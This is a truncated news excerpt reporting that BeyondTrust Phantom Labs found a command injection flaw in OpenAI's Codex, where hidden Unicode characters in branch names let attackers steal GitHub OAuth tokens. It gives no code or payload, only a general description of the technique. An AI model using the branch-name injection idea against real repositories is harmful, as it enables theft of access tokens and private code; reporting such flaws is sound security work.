OpenAI Codex Vulnerability Allowed Attackers to Steal GitHub Tokens
hackread.comBeyondTrust Phantom Labs researchers have revealed a critical command injection vulnerability in OpenAI’s Codex. The flaw allowed attackers to steal sensitive GitHub OAuth tokens using hidden Unicode characters in branch names, potentially compromising entire enterprise environments.
A substantial security vulnerability has been identified in OpenAI’s Codex, a tool used by countless developers to assist in writing and reviewing code. The flaw could have allowed hackers to steal GitHub Access Tokens, which are the keys that give someone full control over a person’s or a company’s private code repositories.
These findings come from researchers at BeyondTrust Phantom Labs, who found that a simple lack of input sanitization could turn a coding assistant into a potential doorway for data theft.
The Invisible Branch Trick
For your information, tools like Codex need a token to access a programmer’s work. Phantom Labs researchers discovered the system failed to properly ...
Copyright of this story solely belongs to hackread.com . To see the full text click HERE